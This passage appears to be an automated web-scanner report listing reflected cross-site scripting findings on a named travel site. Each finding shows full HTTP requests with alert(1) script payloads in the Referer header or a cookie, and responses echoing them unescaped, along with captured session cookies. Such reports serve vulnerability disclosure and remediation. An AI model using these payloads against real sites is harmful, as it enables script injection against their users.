Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/miami-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 7d0cc<script>alert(1)</script>82cf3670cd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/miami-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=7d0cc<script>alert(1)</script>82cf3670cd6

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:42 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:42 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:52:42 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_7d0cc%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B82cf3670cd6%3A%3A%3A%3A%3A%3A1289685163%3A%3A%3A; expires=Thu, 18-Nov-2010 21:52:43 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=7d0cc<script>alert(1)</script>82cf3670cd6</p>
...[SNIP]...

2.112. http://www.smartertravel.com/travel-guides/orlando-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/orlando-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 210ee<script>alert(1)</script>1d5f4d2f5c7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/orlando-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=210ee<script>alert(1)</script>1d5f4d2f5c7

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:49:26 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:49:26 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:49:26 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_210ee%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B1d5f4d2f5c7%3A%3A%3A%3A%3A%3A1289684967%3A%3A%3A; expires=Thu, 18-Nov-2010 21:49:27 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=210ee<script>alert(1)</script>1d5f4d2f5c7</p>
...[SNIP]...

2.113. http://www.smartertravel.com/travel-guides/richmond-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/richmond-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e7b63<script>alert(1)</script>4367e4e4ce1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/richmond-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=e7b63<script>alert(1)</script>4367e4e4ce1

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 22:04:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:50 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:04:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_e7b63%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B4367e4e4ce1%3A%3A%3A%3A%3A%3A1289685891%3A%3A%3A; expires=Thu, 18-Nov-2010 22:04:51 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=e7b63<script>alert(1)</script>4367e4e4ce1</p>
...[SNIP]...

2.114. http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/tokyo-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 6c8f9<script>alert(1)</script>0367c09c826 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/tokyo-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=6c8f9<script>alert(1)</script>0367c09c826

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 22:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:03:16 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:03:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:03:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_6c8f9%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B0367c09c826%3A%3A%3A%3A%3A%3A1289685797%3A%3A%3A; expires=Thu, 18-Nov-2010 22:03:17 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=6c8f9<script>alert(1)</script>0367c09c826</p>
...[SNIP]...

2.115. http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/tulsa-travel-guide.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ae720<script>alert(1)</script>051b3fa7778 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /travel-guides/tulsa-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;
Referer: http://www.google.com/search?hl=en&q=ae720<script>alert(1)</script>051b3fa7778

Response

HTTP/1.0 404 Not Found
Date: Sat, 13 Nov 2010 21:51:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:51:51 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:51:51 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:51:51 GMT; path=/; domain=.smartertravel.com
Set-Cookie: referrer=org_google.com_ae720%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B051b3fa7778%3A%3A%3A%3A%3A%3A1289685112%3A%3A%3A; expires=Thu, 18-Nov-2010 21:51:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.google.com/search?hl=en&q=ae720<script>alert(1)</script>051b3fa7778</p>
...[SNIP]...

2.116. http://www.smartertravel.com/compare-prices/ [o_prvchan cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c3b6</script><script>alert(1)</script>eab2f530661 was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=6c3b6</script><script>alert(1)</script>eab2f530661; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 23:39:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:39:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:39:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:39:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Airfare; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 54870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
Name="SmarterTravel BookingBuddy Affiliate: air";s.eVar25="SmarterTravel BookingBuddy Affiliate: air";s.eVar37="1|I5";s.channel="Compare Prices | Airfare";s.eVar24="Compare Prices | Airfare";s.eVar19="6c3b6</script><script>alert(1)</script>eab2f530661";s.server="app4";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)docu
...[SNIP]...

2.117. http://www.smartertravel.com/compare-prices/car-rental/ [o_prvchan cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/car-rental/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 445bb</script><script>alert(1)</script>0933f26eb7a was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/car-rental/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=445bb</script><script>alert(1)</script>0933f26eb7a; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 23:42:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:43:52 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:43:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:43:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=Compare+Prices+%7C+Car+Rental; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><
...[SNIP]...
SmarterTravel BookingBuddy Affiliate: car";s.eVar25="SmarterTravel BookingBuddy Affiliate: car";s.eVar37="1|I5";s.channel="Compare Prices | Car Rental";s.eVar24="Compare Prices | Car Rental";s.eVar19="445bb</script><script>alert(1)</script>0933f26eb7a";s.server="app2";s.prop10="kayak_Air_Smarter_Travel_All_Vacation_Ad_2";s.events="event8,event15";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)docu
...[SNIP]...

2.118. http://www.smartertravel.com/compare-prices/cruise/ [o_prvchan cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/cruise/

Issue detail

The value of the o_prvchan cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0ca3</script><script>alert(1)</script>3ee3f4baebf was submitted in the o_prvchan cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /compare-prices/cruise/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=e0ca3</script><script>alert(1)</script>3ee3f4baebf; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 23:45:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
